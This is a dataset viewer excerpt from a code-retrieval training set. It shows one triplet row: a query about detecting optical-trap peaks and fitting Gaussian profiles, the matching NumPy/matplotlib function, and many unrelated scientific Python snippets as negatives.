Dataset columns (as shown in the dataset viewer):

| Column | Type | Value range |
| --- | --- | --- |
| query | string | lengths 9 to 3.4k |
| document | string | lengths 9 to 87.4k |
| metadata | dict | |
| negatives | sequence | lengths 4 to 101 |
| negative_scores | sequence | lengths 4 to 101 |
| document_score | string | lengths 3 to 10 |
| document_rank | string | 102 classes |
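Assuming the dataset is hosted in the standard Hugging Face `datasets` layout, a row with this schema can be loaded and inspected roughly as sketched below; the repository id `user/code-retrieval-triplets` is a placeholder, not the actual dataset path.

```python
from datasets import load_dataset

# Placeholder repository id -- substitute the real dataset path.
ds = load_dataset("user/code-retrieval-triplets", split="train")

row = ds[0]
print(row["query"][:80])           # natural-language description of the code
print(row["document"][:80])        # the matching code snippet
print(len(row["negatives"]))       # between 4 and 101 hard negatives per row
print(row["negative_scores"][:5])  # scores paired with the negatives
print(row["document_score"], row["document_rank"])
```

The example row below follows this schema: a docstring-style query, the code it describes, the training objective, and a list of negative code snippets.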
Scans the given image for the 'ntraps' number of trap intensity peaks. Then extracts the 1-dimensional Gaussian profiles across the traps and returns a list of the amplitudes.
```python
def guess_image(which_cam, image, ntraps):
    threshes = [0.5, 0.65]

    ## Image Conditioning ##
    margin = 10
    threshold = np.max(image) * threshes[which_cam]
    im = image.transpose()

    x_len = len(im)
    peak_locs = np.zeros(x_len)
    peak_vals = np.zeros(x_len)

    ## Trap Peak Detection ##
    for i in range(x_len):
        if i < margin or x_len - i < margin:
            peak_locs[i] = 0
            peak_vals[i] = 0
        else:
            peak_locs[i] = np.argmax(im[i])
            peak_vals[i] = max(im[i])

    ## Trap Range Detection ##
    first = True
    pos_first, pos_last = 0, 0
    left_pos = 0
    for i, p in enumerate(peak_vals):
        if p > threshold:
            left_pos = i
        elif p < threshold and left_pos != 0:
            if first:
                pos_first = (left_pos + i) // 2
                first = False
            pos_last = (left_pos + i) // 2
            left_pos = 0

    ## Separation Value ##
    separation = (pos_last - pos_first) / ntraps  # In Pixels

    ## Initial Guesses ##
    means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
    waists0 = (separation * np.ones(ntraps) / 2).tolist()
    ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
    _params0 = [means0, waists0, ampls0, [0.06]]
    params0 = [item for sublist in _params0 for item in sublist]

    xdata = np.arange(x_len)
    plt.figure()
    plt.plot(xdata, peak_vals)
    plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r')  # Initial Guess
    plt.xlim((pos_first - margin, pos_last + margin))
    plt.legend(["Data", "Guess", "Fit"])
    plt.show(block=False)
```
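The initial guesses are packed into a single flat list (`params0`) laid out as [means..., waists..., amplitudes..., offset], the same convention that `wrapper_fit_func` (one of the negatives below) unpacks on the other side. A minimal, self-contained sketch of that packing/unpacking convention follows; the exact form of `gaussian1d` is an assumption, since its definition is not part of this sample.

```python
import numpy as np

def gaussian1d(x, x0, w, a, offset):
    # Assumed single-trap profile; the real definition is not shown in this sample.
    return a * np.exp(-2 * (x - x0) ** 2 / w ** 2) + offset

def unpack_params(params, ntraps):
    # Mirrors the flat [means..., waists..., ampls..., offset] layout built in params0.
    means = params[:ntraps]
    waists = params[ntraps:2 * ntraps]
    ampls = params[2 * ntraps:3 * ntraps]
    offset = params[-1]
    return means, waists, ampls, offset

ntraps = 3
x = np.arange(200)
params0 = [50, 100, 150, 10, 10, 10, 1.0, 0.9, 1.1, 0.06]  # 3 means, 3 waists, 3 amplitudes, offset
means, waists, ampls, offset = unpack_params(params0, ntraps)
profile = sum(gaussian1d(x, m, w, a, 0) for m, w, a in zip(means, waists, ampls)) + offset
print(profile.shape)  # (200,)
```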
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):\n threshes = [0.5, 0.6]\n margin = 10\n threshold = np.max(image) * threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n ## Fitting ##\n if verbose:\n print(\"Fitting...\")\n xdata = np.arange(x_len)\n popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),\n xdata, peak_vals, p0=params0)\n if verbose:\n print(\"Fit!\")\n plt.figure()\n plt.plot(xdata, peak_vals) # Data\n if iteration:\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit\n plt.title(\"Iteration: %d\" % iteration)\n else:\n plt.title(\"Final Product\")\n\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)\n print(\"Fig_Newton\")\n trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])\n return trap_powers", "def trapfilt_taps(N, phil, alfa):\n\n\n\n tt = arange(-N/2,N/2 + 1) # Time axis for h(t) \n # ***** Generate impulse response ht here *****\n ht = zeros(len(tt))\n ix = where(tt != 0)[0]\n if alfa != 0:\n ht[ix] = ((sin(2*pi*phil*tt[ix]))/(pi*tt[ix]))*((sin(2*pi*alfa*phil*tt[ix]))/(2*pi*alfa*phil*tt[ix]))\n else:\n ht[ix] = (sin(2*pi*phil*tt[ix]))/(pi*tt[ix])\n ix0 = where(tt == 0)[0]\n ht[ix0] = 2*phil\n ht = ht/sum(power(ht,2))\n\n return ht", "def gaussianFilter(gain,BT,spSym,nTaps):\n\n a = np.sqrt(np.log(2)/2)/BT\n t = np.linspace(-.5*nTaps,.5*nTaps-1,nTaps)/spSym\n\n ft = np.sqrt(np.pi)/a *np.exp(-(np.pi**2*(t)**2)/a**2)\n ft /= np.sum(ft) * gain # normalize filter\n\n return ft", "def gaussian_proba_map(img):\n method = 'cv2.TM_CCOEFF_NORMED'\n sigmas = [41,31,21,11]\n out = np.zeros(img.shape)\n for sigma in sigmas:\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n img2 = img.copy()\n meth = eval(method)\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n res = np.pad(res,size/2,mode='constant')\n to_replace = res>out\n out[to_replace] = res[to_replace]\n return out", "def compute_tap_features(xtaps, ytaps, t, threshold=20):\n import numpy as np\n\n from mhealthx.extractors.tapping import compute_drift, \\\n compute_tap_intervals, compute_intertap_gap\n from mhealthx.extractors.tapping import TapFeatures as T\n from mhealthx.signals import signal_features\n\n if isinstance(xtaps, list):\n xtaps = np.array(xtaps)\n if isinstance(ytaps, list):\n ytaps = np.array(ytaps)\n if isinstance(t, 
list):\n t = np.array(t)\n\n # Intertap intervals:\n ipress, intervals = compute_tap_intervals(xtaps, t, threshold)\n\n # Filter data:\n t = t[ipress]\n xtaps = xtaps[ipress]\n ytaps = ytaps[ipress]\n\n # Delta between fastest and slowest intertap intervals:\n T.intertap_gap10, T.intertap_gap25, \\\n T.intertap_gap50 = compute_intertap_gap(intervals)\n\n # Left and right taps and drift:\n mean_x = np.mean(xtaps)\n iL = np.where(xtaps < mean_x)\n iR = np.where(xtaps >= mean_x)\n xL = xtaps[iL]\n yL = ytaps[iL]\n xR = xtaps[iR]\n yR = ytaps[iR]\n driftL = compute_drift(xL, yL)\n driftR = compute_drift(xR, yR)\n\n # Number of taps:\n T.num_taps = xtaps.size\n T.num_taps_left = xL.size\n T.num_taps_right = xR.size\n\n # Time:\n T.time_rng = t[-1] - t[0]\n\n # Intertap interval statistics:\n T.intertap_num, T.intertap_min, T.intertap_max, T.intertap_rng, \\\n T.intertap_avg, T.intertap_std, T.intertap_med, T.intertap_mad, \\\n T.intertap_kurt, T.intertap_skew, T.intertap_cvar, T.intertap_lower25, \\\n T.intertap_upper25, T.intertap_inter50, T.intertap_rms, \\\n T.intertap_entropy, T.intertap_tk_energy = signal_features(intervals)\n\n # Tap statistics:\n T.xL_num, T.xL_min, T.xL_max, T.xL_rng, T.xL_avg, T.xL_std, \\\n T.xL_med, T.xL_mad, T.xL_kurt, T.xL_skew, T.xL_cvar, \\\n T.xL_lower25, T.xL_upper25, T.xL_inter50, T.xL_rms, \\\n T.xL_entropy, T.xL_tk_energy = signal_features(xL)\n\n T.xR_num, T.xR_min, T.xR_max, T.xR_rng, T.xR_avg, T.xR_std, \\\n T.xR_med, T.xR_mad, T.xR_kurt, T.xR_skew, T.xR_cvar, \\\n T.xR_lower25, T.xR_upper25, T.xR_inter50, T.xR_rms, \\\n T.xR_entropy, T.xR_tk_energy = signal_features(xR)\n\n # T.yL_num, T.yL_min, T.yL_max, T.yL_rng, T.yL_avg, T.yL_std, \\\n # T.yL_med, T.yL_mad, T.yL_kurt, T.yL_skew, T.yL_cvar, \\\n # T.yL_lower25, T.yL_upper25, T.yL_inter50, T.yL_rms, \\\n # T.yL_entropy, T.yL_tk_energy = signal_features(yL)\n\n # T.yR_num, T.yR_min, T.yR_max, T.yR_rng, T.yR_avg, T.yR_std, \\\n # T.yR_med, T.yR_mad, T.yR_kurt, T.yR_skew, T.yR_cvar, \\\n # T.yR_lower25, T.yR_upper25, T.yR_inter50, T.yR_rms, \\\n # T.yR_entropy, T.yR_tk_energy = signal_features(yR)\n\n # Drift statistics:\n T.driftL_num, T.driftL_min, T.driftL_max, T.driftL_rng, T.driftL_avg, \\\n T.driftL_std, T.driftL_med, T.driftL_mad, T.driftL_kurt, T.driftL_skew, \\\n T.driftL_cvar, T.driftL_lower25, T.driftL_upper25, T.driftL_inter50, \\\n T.driftL_rms, T.driftL_entropy, T.driftL_tk_energy = \\\n signal_features(driftL)\n\n T.driftR_num, T.driftR_min, T.driftR_max, T.driftR_rng, T.driftR_avg, \\\n T.driftR_std, T.driftR_med, T.driftR_mad, T.driftR_kurt, T.driftR_skew, \\\n T.driftR_cvar, T.driftR_lower25, T.driftR_upper25, T.driftR_inter50, \\\n T.driftR_rms, T.driftR_entropy, T.driftR_tk_energy = \\\n signal_features(driftR)\n\n return T", "def extract_features(img, sigmas, n_features): \n dims = img.shape # dimensions of the image\n \n features = np.zeros((dims[0], dims[1], n_features)) # each feature map has the same size as the input image\n \n # the first feature we use is the pixel intensity in the green channel itself\n img_g = img[:,:,1] #I just assume it follows the RGB convention and not GBR or BGR...\n features[:,:,0] = img_g\n features[:,:,1] = np.sum(img,axis=2) \n \n gabors = get_gabors() \n \n # >>> YOUR CODE STARTS HERE <<<\n i = 2\n# for s in sigmas:\n# gfilters = gauss_filter(s)\n# for gf in gfilters:\n# features[:,:,i] = scipy.signal.fftconvolve(img_g, gf, mode='same') ;i+=1\n for s in sigmas:\n gauss = gauss_filter(s)\n for g in gauss:\n features[:,:,i] = 
scipy.signal.fftconvolve(img_g, g, mode='same') ;i+=1\n \n for gabor in gabors:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, gabor, mode='same') ;i+=1\n \n \n features[:,:,i] = sobel(img_g, axis=0) ;i+=1\n features[:,:,i] = sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = sobel(img_g, axis=0)+sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0.0) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0, low_threshold=13, high_threshold=50);i+=1\n features[:,:,i] = feature.canny(img_g, sigma=1)\n # >>> YOUR CODE ENDS HERE <<< \n \n return features", "def read_amplification(amp_file = 'dist.dat'):\n n_img, amp_img = np.loadtxt(amp_file, usecols=(0, 6), unpack=True)\n\n amp = []\n\n amp_tmp = []\n\n count = 1\n\n for i in range(len(n_img)):\n if count == n_img[i]:\n amp_tmp.append( amp_img[i] )\n else:\n amp.append(amp_tmp)\n\n amp_tmp = []\n\n amp_tmp.append( amp_img[i] )\n\n count = count + 1\n amp.append(amp_tmp)\n\n return amp", "def cs4243_gauss_pyramid(image, n=3):\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n ## your code here####\n\n pyramid = [image]\n for i in range(n):\n gpyr_image = cs4243_filter_faster(pyramid[i], kernel)\n gpyr_image = cs4243_downsample(gpyr_image, 2)\n pyramid.append(gpyr_image)\n \n ##\n return pyramid", "def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):\n array = np.zeros(np.shape(x))\n for k in range(ntraps):\n array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)\n return array + offset", "def get_gaussian_ff_top(self, filenames):\n amber_ffs = []\n for fname in filenames:\n amber_ffs.append(self._get_gaussian_ff_top_single(filename=fname))\n return amber_ffs", "def get_fluxes_within_mask(tpf, aper_mask, gaia_sources):\n assert tpf is not None\n assert aper_mask is not None\n assert gaia_sources is not None\n ra, dec = gaia_sources[[\"ra\", \"dec\"]].values.T\n pix_coords = tpf.wcs.all_world2pix(np.c_[ra, dec], 0)\n contour_points = measure.find_contours(aper_mask, level=0.1)[0]\n isinside = [\n is_point_inside_mask(contour_points, pix) for pix in pix_coords\n ]\n min_gmag = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].min()\n gamma = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].apply(\n lambda x: 10 ** (0.4 * (min_gmag - x))\n )\n return gamma", "def compute_tap_intervals(xtaps, t, threshold=20):\n import numpy as np\n\n if isinstance(xtaps, list):\n xtaps = np.asarray(xtaps)\n if isinstance(t, list):\n t = np.asarray(t)\n\n # Set time points:\n tap_times = t - t[0]\n\n # Calculate x offset:\n xtaps_offset = xtaps - np.mean(xtaps)\n\n # Find left/right finger \"press\" events:\n dx = xtaps_offset[1:] - xtaps_offset[:-1]\n ipress = np.where(np.abs(dx) > threshold)\n\n # Filter data:\n #xtaps = xtaps[ipress]\n tap_times = tap_times[ipress]\n\n # Find press event intervals:\n tap_intervals = tap_times[1:] - tap_times[:-1]\n\n return ipress, tap_intervals", "def smooth_spectra(xarr, farr, sigma=3, nkern=20):\n xkern = np.arange(nkern)\n kern = np.exp(-(xkern - 0.5 * nkern) ** 2 / (sigma) ** 2)\n\n return gaussian_filter1d(farr, sigma)", "def _get_features_from_batch_images(self, img, r, p):\n tmp_feats = []\n for channel in range(4):\n current_img = img[channel, :, :]\n tmp_feats = np.append(tmp_feats, np.histogram(current_img)[0])\n # extract 8*8 patches of 64*64 px and derive 10 bins histogram\n for j in range(r):\n for k in range(r):\n tmp_feats = np.append(\n tmp_feats,\n np.histogram(current_img[j * p:(j + 1) * (p), k *\n p:(k + 1) * p])[0])\n return tmp_feats", "def features_sigma(img,\n 
sigma,\n intensity=True,\n edges=True,\n texture=True):\n\n features = []\n\n gx,gy = np.meshgrid(np.arange(img.shape[1]), np.arange(img.shape[0]))\n # print(gx.shape)\n #features.append(gx)\n gx = filters.gaussian(gx, sigma)\n gy = filters.gaussian(gy, sigma)\n\n features.append(np.sqrt(gx**2 + gy**2)) #use polar radius of pixel locations as cartesian coordinates\n\n del gx, gy\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Location features extracted using sigma= %f' % (sigma))\n\n img_blur = filters.gaussian(img, sigma)\n\n if intensity:\n features.append(img_blur)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Intensity features extracted using sigma= %f' % (sigma))\n\n if edges:\n features.append(filters.sobel(img_blur))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Edge features extracted using sigma= %f' % (sigma))\n\n if texture:\n H_elems = [\n np.gradient(np.gradient(img_blur)[ax0], axis=ax1)\n for ax0, ax1 in itertools.combinations_with_replacement(range(img.ndim), 2)\n ]\n\n eigvals = feature.hessian_matrix_eigvals(H_elems)\n del H_elems\n\n for eigval_mat in eigvals:\n features.append(eigval_mat)\n del eigval_mat\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Texture features extracted using sigma= %f' % (sigma))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image features extracted using sigma= %f' % (sigma))\n\n return features", "def repIpdTft(length,gammas,epsilon):\r\n avgRewards = []\r\n for gamma in gammas: \r\n avgRewards.append(np.mean(ipdTft(length,gamma,epsilon)))\r\n return(avgRewards)", "def sample(self, n_samps):\n # print('gauss trying to sample '+str(n_samps)+' from '+str(self.dist))\n # xs = np.array([self.sample_one() for n in range(n_samps)])\n xs = np.array(self.dist.sample(n_samps))\n # print('gauss sampled '+str(n_samps)+' from '+str(self.dist))\n return xs", "def extract_features(\n img,\n n_sigmas,\n multichannel=True,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16,\n):\n if multichannel: #img.ndim == 3 and multichannel:\n all_results = (\n extract_features_2d(\n dim,\n img[..., dim],\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n for dim in range(img.shape[-1])\n )\n features = list(itertools.chain.from_iterable(all_results))\n else:\n features = extract_features_2d(0,\n img,\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Feature extraction complete')\n\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n logging.info('Memory mapping features to temporary file')\n\n features = memmap_feats(features)\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n return features #np.array(features)", "def t1_hypointensity( x, xsegmentation, xWMProbability, template, templateWMPrior, wmh_thresh=0.1 ):\n mybig = [88,128,128]\n templatesmall = ants.resample_image( template, mybig, use_voxels=True )\n qaff = ants.registration(\n ants.rank_intensity(x),\n ants.rank_intensity(templatesmall), 'SyN',\n syn_sampling=2,\n syn_metric='CC',\n reg_iterations = [25,15,0,0],\n aff_metric='GC', random_seed=1 )\n afftx = qaff['fwdtransforms'][1]\n 
templateWMPrior2x = ants.apply_transforms( x, templateWMPrior, qaff['fwdtransforms'] )\n cerebrum = ants.threshold_image( xsegmentation, 2, 4 )\n realWM = ants.threshold_image( templateWMPrior2x , 0.1, math.inf )\n inimg = ants.rank_intensity( x )\n parcellateWMdnz = ants.kmeans_segmentation( inimg, 2, realWM, mrf=0.3 )['probabilityimages'][0]\n x2template = ants.apply_transforms( templatesmall, x, afftx, whichtoinvert=[True] )\n parcellateWMdnz2template = ants.apply_transforms( templatesmall,\n cerebrum * parcellateWMdnz, afftx, whichtoinvert=[True] )\n # features = rank+dnz-image, lprob, wprob, wprior at mybig resolution\n f1 = x2template.numpy()\n f2 = parcellateWMdnz2template.numpy()\n f3 = ants.apply_transforms( templatesmall, xWMProbability, afftx, whichtoinvert=[True] ).numpy()\n f4 = ants.apply_transforms( templatesmall, templateWMPrior, qaff['fwdtransforms'][0] ).numpy()\n myfeatures = np.stack( (f1,f2,f3,f4), axis=3 )\n newshape = np.concatenate( [ [1],np.asarray( myfeatures.shape )] )\n myfeatures = myfeatures.reshape( newshape )\n\n inshape = [None,None,None,4]\n wmhunet = antspynet.create_unet_model_3d( inshape,\n number_of_outputs = 1,\n number_of_layers = 4,\n mode = 'sigmoid' )\n\n wmhunet.load_weights( get_data(\"simwmhseg\", target_extension='.h5') )\n\n pp = wmhunet.predict( myfeatures )\n\n limg = ants.from_numpy( tf.squeeze( pp[0] ).numpy( ) )\n limg = ants.copy_image_info( templatesmall, limg )\n lesresam = ants.apply_transforms( x, limg, afftx, whichtoinvert=[False] )\n # lesresam = lesresam * cerebrum\n rnmdl = antspynet.create_resnet_model_3d( inshape,\n number_of_classification_labels = 1,\n layers = (1,2,3),\n residual_block_schedule = (3,4,6,3), squeeze_and_excite = True,\n lowest_resolution = 32, cardinality = 1, mode = \"regression\" )\n rnmdl.load_weights( get_data(\"simwmdisc\", target_extension='.h5' ) )\n qq = rnmdl.predict( myfeatures )\n\n lesresamb = ants.threshold_image( lesresam, wmh_thresh, 1.0 )\n lgo=ants.label_geometry_measures( lesresamb, lesresam )\n wmhsummary = pd.read_csv( get_data(\"wmh_evidence\", target_extension='.csv' ) )\n wmhsummary.at[0,'Value']=lgo.at[0,'VolumeInMillimeters']\n wmhsummary.at[1,'Value']=lgo.at[0,'IntegratedIntensity']\n wmhsummary.at[2,'Value']=float(qq)\n\n return {\n \"wmh_summary\":wmhsummary,\n \"wmh_probability_image\":lesresam,\n \"wmh_evidence_of_existence\":float(qq),\n \"wmh_max_prob\":lesresam.max(),\n \"features\":myfeatures }", "def find_peaks(f_arr, sigma, niter, bsigma=None):\n # set up the variables\n if bsigma is None:\n bsigma = sigma\n\n # determine the background statistics\n back_ave, back_std = find_backstats(f_arr, sigma, niter)\n\n # calculate the differences between the pixels\n dfh = f_arr[1:-1] - f_arr[:-2]\n dfl = f_arr[1:-1] - f_arr[2:]\n\n # find the objects\n mask = (dfh > 0) * (dfl > 0) * \\\n (abs(f_arr[1:-1] - back_ave) > back_std * sigma)\n t = np.where(mask)[0]\n return t + 1", "def calculate_psf_tilts():\n for order in [1, 2]:\n\n # Get the file\n path = 'files/SOSS_PSF_tilt_order{}.npy'.format(order)\n psf_file = resource_filename('awesimsoss', path)\n\n # Dimensions\n subarray = 'SUBSTRIP256'\n X = range(2048)\n Y = range(256)\n\n # Get the wave map\n wave_map = utils.wave_solutions(subarray, order).astype(float)\n\n # Get the y-coordinate of the trace polynomial in this column\n # (center of the trace)\n coeffs = trace_polynomials(subarray=subarray, order=order)\n trace = np.polyval(coeffs, X)\n\n # Interpolate to get the wavelength value at the center\n wave = interp2d(X, Y, 
wave_map)\n\n # Get the wavelength of the trace center in each column\n trace_wave = []\n for x, y in zip(X, trace):\n trace_wave.append(wave(x, y)[0])\n\n # For each column wavelength (defined by the wavelength at\n # the trace center) define an isowavelength contour\n angles = []\n for n, x in enumerate(X):\n\n w = trace_wave[x]\n\n # Edge cases\n try:\n w0 = trace_wave[x-1]\n except IndexError:\n w0 = 0\n\n try:\n w1 = trace_wave[x+1]\n except IndexError:\n w1 = 10\n\n # Define the width of the wavelength bin as half-way\n # between neighboring points\n dw0 = np.mean([w0, w])\n dw1 = np.mean([w1, w])\n\n # Get the coordinates of all the pixels in that range\n yy, xx = np.where(np.logical_and(wave_map >= dw0, wave_map < dw1))\n\n # Find the angle between the vertical and the tilted wavelength bin\n if len(xx) >= 1:\n angle = get_angle([xx[-1], yy[-1]], [x, trace[x]])\n else:\n angle = 0\n\n # Don't flip them upside down\n angle = angle % 180\n\n # Add to the array\n angles.append(angle)\n\n # Save the file\n np.save(psf_file, np.array(angles))\n print('Angles saved to', psf_file)", "def haperfluxMany(inputlist, maplist, radius, rinner, router, galactic=True, decimal=True, noise_model=0):\n\n ## Names and frequencies of the sample maps included in this repo.\n\n freqlist = ['30','44','70','100','143','217','353','545','857','1249','1874','2141','2998','3331','4612','4997','11992','16655','24983','24983','24983','33310']\n freqval = [28.405889, 44.072241,70.421396,100.,143.,217.,353.,545.,857.,1249.,1874.,2141.,2141.,2998.,2998.,3331.,4612.,4997.,11992.,16655.,24983.,24983.,24983.,33310.]\n band_names = [\"akari9\", \"dirbe12\",\"iras12\",\"wise12\",\"akari18\",\"iras25\",\"iras60\",\"akari65\",\"akari90\",\"dirbe100\",\"iras100\",\"akari140\",\"dirbe140\",\"akari160\",\"dirbe240\",\"planck857\", \"planck545\"]\n\n k0 = 1.0\n k1 = rinner/radius\n k2 = router/radius\n apcor = ((1 - (0.5)**(4*k0**2))-((0.5)**(4*k1**2) - (0.5)**(4*k2**2)))**(-1)\n\n # 'galactic' overrules 'decimal'\n if (galactic==True):\n dt=[('sname',np.dtype('S13')),('glon',np.float32),('glat',np.float32)]\n targets = np.genfromtxt(inputlist, delimiter=\",\",dtype=dt)\n\n ns = len(targets['glat'])\n\n fd3 = -1\n fd_err3 = -1\n\n fn = np.genfromtxt(maplist, delimiter=\" \", dtype='str')\n nmaps = len(fn)\n ## Initialize the arrays which will hold the results\n fd_all = np.zeros((ns,nmaps))\n fd_err_all = np.zeros((ns,nmaps))\n fd_bg_all = np.zeros((ns,nmaps))\n\n # Start the actual processing: Read-in the maps.\n for ct2 in range(0,nmaps):\n xtmp_data, xtmp_head = hp.read_map(fn[ct2], h=True, verbose=False, nest=False)\n freq = dict(xtmp_head)['FREQ']\n units = dict(xtmp_head)['TUNIT1']\n freq_str = str(freq)\n idx = freqlist.index(str(freq))\n currfreq = int(freq)\n\n if (radius == None):\n radval = fwhmlist[idx]\n else:\n radval = radius\n\n\n for ct in range(0,ns):\n\n glon = targets['glon'][ct]\n glat = targets['glat'][ct]\n\n fd_all[ct,ct2], fd_err_all[ct,ct2], fd_bg_all[ct,ct2] = \\\n haperflux(inmap= xtmp_data, freq= currfreq, lon=glon, lat=glat, aper_inner_radius=radius, aper_outer_radius1=rinner, \\\n aper_outer_radius2=router,units=units, noise_model=noise_model)\n\n if (np.isfinite(fd_err_all[ct,ct2]) == False):\n fd_all[ct,ct2] = -1\n fd_err_all[ct,ct2] = -1\n else:\n if radius==None:\n fd_all[ct,ct2] = fd_all[ct,ct2]*apcor\n fd_err_all[ct,ct2] = fd_err_all[ct,ct2]*apcor\n\n return fd_all, fd_err_all, fd_bg_all", "def tapered_spectra(s, tapers, NFFT=None, low_bias=True):\r\n N = s.shape[-1]\r\n # XXX: don't 
allow NFFT < N -- not every implementation is so restrictive!\r\n if NFFT is None or NFFT < N:\r\n NFFT = N\r\n rest_of_dims = s.shape[:-1]\r\n M = int(np.product(rest_of_dims))\r\n\r\n s = s.reshape(int(np.product(rest_of_dims)), N)\r\n # de-mean this sucker\r\n s = utils.remove_bias(s, axis=-1)\r\n\r\n if not isinstance(tapers, np.ndarray):\r\n # then tapers is (NW, K)\r\n args = (N,) + tuple(tapers)\r\n dpss, eigvals = dpss_windows(*args)\r\n if low_bias:\r\n keepers = (eigvals > 0.9)\r\n dpss = dpss[keepers]\r\n eigvals = eigvals[keepers]\r\n tapers = dpss\r\n else:\r\n eigvals = None\r\n K = tapers.shape[0]\r\n sig_sl = [slice(None)] * len(s.shape)\r\n sig_sl.insert(len(s.shape) - 1, np.newaxis)\r\n\r\n # tapered.shape is (M, Kmax, N)\r\n tapered = s[sig_sl] * tapers\r\n\r\n # compute the y_{i,k}(f) -- full FFT takes ~1.5x longer, but unpacking\r\n # results of real-valued FFT eats up memory\r\n t_spectra = fftpack.fft(tapered, n=NFFT, axis=-1)\r\n t_spectra.shape = rest_of_dims + (K, NFFT)\r\n if eigvals is None:\r\n return t_spectra\r\n return t_spectra, eigvals", "def process_noise(qubit, tstep, noise_samples, sigma_array):\n from scipy.stats import norm\n noise_weights = np.zeros((len(sigma_array), len(noise_samples)))\n average_chi_array = np.zeros((len(sigma_array), 9,9), dtype=complex)\n raw_chi_array = noise_iteration(qubit, tstep, noise_samples)\n for i in range(len(sigma_array)):\n noise_weights[i, :] += norm.pdf(noise_samples, loc=0.0, scale=sigma_array[i])\n average_chi_array[i, :, :] += noise_averaging(noise_samples, noise_weights[i, :], raw_chi_array)\n return average_chi_array, raw_chi_array", "def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)", "def addNoise_amp(array,counts):\r\n if array.dtype == 'complex' :\r\n arrayout = addNoise(np.real(array),counts) + 1.0J * addNoise(np.imag(array),counts)\r\n else :\r\n if np.float64(counts) == 0.0e0 :\r\n arrayout = np.copy(array)\r\n elif np.float64(counts) < 0.0e0 :\r\n print 'bg.addNoise : warning counts < 0'\r\n else :\r\n arrayout = np.zeros(array.shape)\r\n arrayout = np.square(normalise(array))\r\n arrayout = np.random.poisson(arrayout*np.float64(counts))/np.float64(counts)\r\n arrayout = np.sqrt(arrayout)\r\n tot = np.sum(np.abs(array)**2)\r\n arrayout = normalise(arrayout,tot)\r\n return arrayout", "def single_channel_stacking(tifs):\n template_ID=int(len(tifs)/2)\n \n template_raster=gdal_array.LoadFile(tifs[template_ID-1])\n avg_raster=np.zeros_like(template_raster)\n avg_raster=avg_raster+1\n new_raster=np.copy(template_raster)\n # ones=np.full(template_raster.shape, 1)\n for i, tif in enumerate(tifs, start=1):\n if i==template_ID: \n continue\n \n tif_raster=gdal_array.LoadFile(tif)\n # tif_raster=cut_transformed_array_borders(tif_raster)\n result=ird.similarity(template_raster,tif_raster , numiter=1, order=1)\n img_transformed= ird.transform_img(tif_raster, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=2)\n \n img_transformed=cut_transformed_array_borders(img_transformed)\n \n # ones_transformed=ird.transform_img(ones, scale=result['scale'], angle=result['angle'], 